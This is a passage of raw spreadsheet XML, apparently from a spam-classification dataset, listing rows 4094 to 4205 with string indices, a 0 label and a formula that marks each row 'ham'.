        <v>ham</v>
      </c>
    </row>
    <row r="4094" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4094" t="s">
        <v>3456</v>
      </c>
      <c r="B4094">
        <v>0</v>
      </c>
      <c r="C4094" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4095" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4095" t="s">
        <v>3457</v>
      </c>
      <c r="B4095">
        <v>0</v>
      </c>
      <c r="C4095" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4096" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4096" t="s">
        <v>3458</v>
      </c>
      <c r="B4096">
        <v>0</v>
      </c>
      <c r="C4096" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4097" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4097" t="s">
        <v>3459</v>
      </c>
      <c r="B4097">
        <v>0</v>
      </c>
      <c r="C4097" t="str">
        <f t="shared" si="63"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4098" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4098" t="s">
        <v>3460</v>
      </c>
      <c r="B4098">
        <v>0</v>
      </c>
      <c r="C4098" t="str">
        <f t="shared" ref="C4098:C4161" si="64">IF(B4098="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="4099" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4099" t="s">
        <v>3461</v>
      </c>
      <c r="B4099">
        <v>0</v>
      </c>
      <c r="C4099" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4100" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4100" t="s">
        <v>3462</v>
      </c>
      <c r="B4100">
        <v>0</v>
      </c>
      <c r="C4100" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4101" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4101" t="s">
        <v>3463</v>
      </c>
      <c r="B4101">
        <v>0</v>
      </c>
      <c r="C4101" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4102" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4102" t="s">
        <v>3464</v>
      </c>
      <c r="B4102">
        <v>0</v>
      </c>
      <c r="C4102" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4103" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4103" t="s">
        <v>3465</v>
      </c>
      <c r="B4103">
        <v>0</v>
      </c>
      <c r="C4103" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4104" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4104" t="s">
        <v>3466</v>
      </c>
      <c r="B4104">
        <v>0</v>
      </c>
      <c r="C4104" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4105" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4105" t="s">
        <v>3467</v>
      </c>
      <c r="B4105">
        <v>0</v>
      </c>
      <c r="C4105" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4106" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4106" t="s">
        <v>3468</v>
      </c>
      <c r="B4106">
        <v>0</v>
      </c>
      <c r="C4106" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4107" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4107" t="s">
        <v>3469</v>
      </c>
      <c r="B4107">
        <v>0</v>
      </c>
      <c r="C4107" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4108" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4108" t="s">
        <v>3470</v>
      </c>
      <c r="B4108">
        <v>0</v>
      </c>
      <c r="C4108" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4109" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4109" t="s">
        <v>3471</v>
      </c>
      <c r="B4109">
        <v>0</v>
      </c>
      <c r="C4109" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4110" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4110" t="s">
        <v>3472</v>
      </c>
      <c r="B4110">
        <v>0</v>
      </c>
      <c r="C4110" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4111" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4111" t="s">
        <v>3473</v>
      </c>
      <c r="B4111">
        <v>0</v>
      </c>
      <c r="C4111" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4112" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4112" t="s">
        <v>3474</v>
      </c>
      <c r="B4112">
        <v>0</v>
      </c>
      <c r="C4112" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4113" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4113" t="s">
        <v>3475</v>
      </c>
      <c r="B4113">
        <v>0</v>
      </c>
      <c r="C4113" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4114" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4114" t="s">
        <v>3476</v>
      </c>
      <c r="B4114">
        <v>0</v>
      </c>
      <c r="C4114" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4115" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4115" t="s">
        <v>3477</v>
      </c>
      <c r="B4115">
        <v>0</v>
      </c>
      <c r="C4115" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4116" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4116" t="s">
        <v>3478</v>
      </c>
      <c r="B4116">
        <v>0</v>
      </c>
      <c r="C4116" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4117" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4117" t="s">
        <v>3479</v>
      </c>
      <c r="B4117">
        <v>0</v>
      </c>
      <c r="C4117" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4118" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4118" t="s">
        <v>3480</v>
      </c>
      <c r="B4118">
        <v>0</v>
      </c>
      <c r="C4118" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4119" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4119" t="s">
        <v>3481</v>
      </c>
      <c r="B4119">
        <v>0</v>
      </c>
      <c r="C4119" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4120" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4120" t="s">
        <v>3482</v>
      </c>
      <c r="B4120">
        <v>0</v>
      </c>
      <c r="C4120" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4121" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4121" t="s">
        <v>3483</v>
      </c>
      <c r="B4121">
        <v>0</v>
      </c>
      <c r="C4121" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4122" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4122" t="s">
        <v>3484</v>
      </c>
      <c r="B4122">
        <v>0</v>
      </c>
      <c r="C4122" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4123" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4123" t="s">
        <v>3485</v>
      </c>
      <c r="B4123">
        <v>0</v>
      </c>
      <c r="C4123" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4124" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4124" t="s">
        <v>3486</v>
      </c>
      <c r="B4124">
        <v>0</v>
      </c>
      <c r="C4124" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4125" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4125" t="s">
        <v>3487</v>
      </c>
      <c r="B4125">
        <v>0</v>
      </c>
      <c r="C4125" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4126" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4126" t="s">
        <v>3488</v>
      </c>
      <c r="B4126">
        <v>0</v>
      </c>
      <c r="C4126" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4127" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4127" t="s">
        <v>3489</v>
      </c>
      <c r="B4127">
        <v>0</v>
      </c>
      <c r="C4127" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4128" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4128" t="s">
        <v>3490</v>
      </c>
      <c r="B4128">
        <v>0</v>
      </c>
      <c r="C4128" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4129" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4129" t="s">
        <v>3491</v>
      </c>
      <c r="B4129">
        <v>0</v>
      </c>
      <c r="C4129" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4130" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4130" t="s">
        <v>3492</v>
      </c>
      <c r="B4130">
        <v>0</v>
      </c>
      <c r="C4130" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4131" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4131" t="s">
        <v>3493</v>
      </c>
      <c r="B4131">
        <v>0</v>
      </c>
      <c r="C4131" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4132" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4132" t="s">
        <v>3494</v>
      </c>
      <c r="B4132">
        <v>0</v>
      </c>
      <c r="C4132" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4133" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4133" t="s">
        <v>3495</v>
      </c>
      <c r="B4133">
        <v>0</v>
      </c>
      <c r="C4133" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4134" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4134" t="s">
        <v>3496</v>
      </c>
      <c r="B4134">
        <v>0</v>
      </c>
      <c r="C4134" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4135" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4135" t="s">
        <v>3497</v>
      </c>
      <c r="B4135">
        <v>0</v>
      </c>
      <c r="C4135" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4136" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4136" t="s">
        <v>3498</v>
      </c>
      <c r="B4136">
        <v>0</v>
      </c>
      <c r="C4136" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4137" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4137" t="s">
        <v>3499</v>
      </c>
      <c r="B4137">
        <v>0</v>
      </c>
      <c r="C4137" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4138" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4138" t="s">
        <v>3500</v>
      </c>
      <c r="B4138">
        <v>0</v>
      </c>
      <c r="C4138" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4139" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4139" t="s">
        <v>3501</v>
      </c>
      <c r="B4139">
        <v>0</v>
      </c>
      <c r="C4139" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4140" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4140" t="s">
        <v>3502</v>
      </c>
      <c r="B4140">
        <v>0</v>
      </c>
      <c r="C4140" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4141" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4141" t="s">
        <v>3503</v>
      </c>
      <c r="B4141">
        <v>0</v>
      </c>
      <c r="C4141" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4142" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4142" t="s">
        <v>3504</v>
      </c>
      <c r="B4142">
        <v>0</v>
      </c>
      <c r="C4142" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4143" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4143" t="s">
        <v>3505</v>
      </c>
      <c r="B4143">
        <v>0</v>
      </c>
      <c r="C4143" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4144" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4144" t="s">
        <v>3506</v>
      </c>
      <c r="B4144">
        <v>0</v>
      </c>
      <c r="C4144" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4145" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4145" t="s">
        <v>3507</v>
      </c>
      <c r="B4145">
        <v>0</v>
      </c>
      <c r="C4145" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4146" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4146" t="s">
        <v>3508</v>
      </c>
      <c r="B4146">
        <v>0</v>
      </c>
      <c r="C4146" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4147" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4147" t="s">
        <v>3509</v>
      </c>
      <c r="B4147">
        <v>0</v>
      </c>
      <c r="C4147" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4148" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4148" t="s">
        <v>3510</v>
      </c>
      <c r="B4148">
        <v>0</v>
      </c>
      <c r="C4148" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4149" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4149" t="s">
        <v>3511</v>
      </c>
      <c r="B4149">
        <v>0</v>
      </c>
      <c r="C4149" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4150" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4150" t="s">
        <v>3512</v>
      </c>
      <c r="B4150">
        <v>0</v>
      </c>
      <c r="C4150" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4151" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4151" t="s">
        <v>3513</v>
      </c>
      <c r="B4151">
        <v>0</v>
      </c>
      <c r="C4151" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4152" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4152" t="s">
        <v>3514</v>
      </c>
      <c r="B4152">
        <v>0</v>
      </c>
      <c r="C4152" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4153" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4153" t="s">
        <v>3515</v>
      </c>
      <c r="B4153">
        <v>0</v>
      </c>
      <c r="C4153" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4154" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4154" t="s">
        <v>3516</v>
      </c>
      <c r="B4154">
        <v>0</v>
      </c>
      <c r="C4154" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4155" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4155" t="s">
        <v>3517</v>
      </c>
      <c r="B4155">
        <v>0</v>
      </c>
      <c r="C4155" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4156" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4156" t="s">
        <v>3518</v>
      </c>
      <c r="B4156">
        <v>0</v>
      </c>
      <c r="C4156" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4157" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4157" t="s">
        <v>3519</v>
      </c>
      <c r="B4157">
        <v>0</v>
      </c>
      <c r="C4157" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4158" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4158" t="s">
        <v>3520</v>
      </c>
      <c r="B4158">
        <v>0</v>
      </c>
      <c r="C4158" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4159" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4159" t="s">
        <v>3521</v>
      </c>
      <c r="B4159">
        <v>0</v>
      </c>
      <c r="C4159" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4160" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4160" t="s">
        <v>3522</v>
      </c>
      <c r="B4160">
        <v>0</v>
      </c>
      <c r="C4160" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4161" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4161" t="s">
        <v>3523</v>
      </c>
      <c r="B4161">
        <v>0</v>
      </c>
      <c r="C4161" t="str">
        <f t="shared" si="64"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4162" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4162" t="s">
        <v>3524</v>
      </c>
      <c r="B4162">
        <v>0</v>
      </c>
      <c r="C4162" t="str">
        <f t="shared" ref="C4162:C4225" si="65">IF(B4162="1", "spam", "ham")</f>
        <v>ham</v>
      </c>
    </row>
    <row r="4163" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4163" t="s">
        <v>3525</v>
      </c>
      <c r="B4163">
        <v>0</v>
      </c>
      <c r="C4163" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4164" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4164" t="s">
        <v>3526</v>
      </c>
      <c r="B4164">
        <v>0</v>
      </c>
      <c r="C4164" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4165" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4165" t="s">
        <v>3527</v>
      </c>
      <c r="B4165">
        <v>0</v>
      </c>
      <c r="C4165" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4166" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4166" t="s">
        <v>3528</v>
      </c>
      <c r="B4166">
        <v>0</v>
      </c>
      <c r="C4166" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4167" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4167" t="s">
        <v>3529</v>
      </c>
      <c r="B4167">
        <v>0</v>
      </c>
      <c r="C4167" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4168" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4168" t="s">
        <v>3530</v>
      </c>
      <c r="B4168">
        <v>0</v>
      </c>
      <c r="C4168" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4169" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4169" t="s">
        <v>3531</v>
      </c>
      <c r="B4169">
        <v>0</v>
      </c>
      <c r="C4169" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4170" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4170" t="s">
        <v>3532</v>
      </c>
      <c r="B4170">
        <v>0</v>
      </c>
      <c r="C4170" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4171" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4171" t="s">
        <v>3533</v>
      </c>
      <c r="B4171">
        <v>0</v>
      </c>
      <c r="C4171" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4172" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4172" t="s">
        <v>3534</v>
      </c>
      <c r="B4172">
        <v>0</v>
      </c>
      <c r="C4172" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4173" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4173" t="s">
        <v>3535</v>
      </c>
      <c r="B4173">
        <v>0</v>
      </c>
      <c r="C4173" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4174" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4174" t="s">
        <v>3536</v>
      </c>
      <c r="B4174">
        <v>0</v>
      </c>
      <c r="C4174" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4175" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4175" t="s">
        <v>3537</v>
      </c>
      <c r="B4175">
        <v>0</v>
      </c>
      <c r="C4175" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4176" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4176" t="s">
        <v>3538</v>
      </c>
      <c r="B4176">
        <v>0</v>
      </c>
      <c r="C4176" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4177" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4177" t="s">
        <v>3539</v>
      </c>
      <c r="B4177">
        <v>0</v>
      </c>
      <c r="C4177" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4178" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4178" t="s">
        <v>3540</v>
      </c>
      <c r="B4178">
        <v>0</v>
      </c>
      <c r="C4178" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4179" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4179" t="s">
        <v>3541</v>
      </c>
      <c r="B4179">
        <v>0</v>
      </c>
      <c r="C4179" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4180" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4180" t="s">
        <v>3542</v>
      </c>
      <c r="B4180">
        <v>0</v>
      </c>
      <c r="C4180" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4181" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4181" t="s">
        <v>3543</v>
      </c>
      <c r="B4181">
        <v>0</v>
      </c>
      <c r="C4181" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4182" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4182" t="s">
        <v>3544</v>
      </c>
      <c r="B4182">
        <v>0</v>
      </c>
      <c r="C4182" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4183" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4183" t="s">
        <v>3545</v>
      </c>
      <c r="B4183">
        <v>0</v>
      </c>
      <c r="C4183" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4184" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4184" t="s">
        <v>3546</v>
      </c>
      <c r="B4184">
        <v>0</v>
      </c>
      <c r="C4184" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4185" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4185" t="s">
        <v>3547</v>
      </c>
      <c r="B4185">
        <v>0</v>
      </c>
      <c r="C4185" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4186" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4186" t="s">
        <v>3548</v>
      </c>
      <c r="B4186">
        <v>0</v>
      </c>
      <c r="C4186" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4187" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4187" t="s">
        <v>3549</v>
      </c>
      <c r="B4187">
        <v>0</v>
      </c>
      <c r="C4187" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4188" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4188" t="s">
        <v>3550</v>
      </c>
      <c r="B4188">
        <v>0</v>
      </c>
      <c r="C4188" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4189" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4189" t="s">
        <v>3551</v>
      </c>
      <c r="B4189">
        <v>0</v>
      </c>
      <c r="C4189" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4190" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4190" t="s">
        <v>3552</v>
      </c>
      <c r="B4190">
        <v>0</v>
      </c>
      <c r="C4190" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4191" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4191" t="s">
        <v>3553</v>
      </c>
      <c r="B4191">
        <v>0</v>
      </c>
      <c r="C4191" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4192" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4192" t="s">
        <v>3554</v>
      </c>
      <c r="B4192">
        <v>0</v>
      </c>
      <c r="C4192" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4193" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4193" t="s">
        <v>3555</v>
      </c>
      <c r="B4193">
        <v>0</v>
      </c>
      <c r="C4193" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4194" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4194" t="s">
        <v>3556</v>
      </c>
      <c r="B4194">
        <v>0</v>
      </c>
      <c r="C4194" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4195" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4195" t="s">
        <v>3557</v>
      </c>
      <c r="B4195">
        <v>0</v>
      </c>
      <c r="C4195" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4196" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4196" t="s">
        <v>3558</v>
      </c>
      <c r="B4196">
        <v>0</v>
      </c>
      <c r="C4196" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4197" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4197" t="s">
        <v>3559</v>
      </c>
      <c r="B4197">
        <v>0</v>
      </c>
      <c r="C4197" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4198" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4198" t="s">
        <v>3560</v>
      </c>
      <c r="B4198">
        <v>0</v>
      </c>
      <c r="C4198" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4199" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4199" t="s">
        <v>3561</v>
      </c>
      <c r="B4199">
        <v>0</v>
      </c>
      <c r="C4199" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4200" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4200" t="s">
        <v>3562</v>
      </c>
      <c r="B4200">
        <v>0</v>
      </c>
      <c r="C4200" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4201" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4201" t="s">
        <v>3563</v>
      </c>
      <c r="B4201">
        <v>0</v>
      </c>
      <c r="C4201" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4202" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4202" t="s">
        <v>3564</v>
      </c>
      <c r="B4202">
        <v>0</v>
      </c>
      <c r="C4202" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4203" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4203" t="s">
        <v>3565</v>
      </c>
      <c r="B4203">
        <v>0</v>
      </c>
      <c r="C4203" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4204" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4204" t="s">
        <v>3566</v>
      </c>
      <c r="B4204">
        <v>0</v>
      </c>
      <c r="C4204" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
    <row r="4205" spans="1:3" x14ac:dyDescent="0.3">
      <c r="A4205" t="s">
        <v>3567</v>
      </c>
      <c r="B4205">
        <v>0</v>
      </c>
      <c r="C4205" t="str">
        <f t="shared" si="65"/>
        <v>ham</v>
      </c>
    </row>
